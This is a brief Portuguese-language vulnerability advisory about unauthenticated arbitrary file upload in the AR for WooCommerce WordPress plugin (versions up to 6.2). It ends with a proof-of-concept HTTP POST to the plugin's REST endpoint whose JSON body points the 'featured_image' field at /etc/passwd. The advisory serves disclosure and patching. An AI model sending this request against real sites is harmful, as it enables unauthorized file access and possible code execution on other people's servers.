
AR For Woocommerce <= 6.2 - Upload Arbitrário de Arquivo sem Autenticação
AR For Woocommerce <= 6.2 - Upload Arbitrário de Arquivo Não Autenticado
O plugin AR for WooCommerce para WordPress é vulnerável a uploads arbitrários de arquivos devido à falta de validação do tipo de arquivo em todas as versões até, e incluindo, 6.2. Isso possibilita que atacantes não autenticados façam upload de arquivos arbitrários no servidor do site afetado, o que pode permitir a execução remota de código.
POST /wp-json/ar-wc-display/featuredimage/ HTTP/2
Host: wp-dev.ddev.site
Content-Type: application/json
Content-Length: 41
{"id":123,"featured_image":"/etc/passwd"}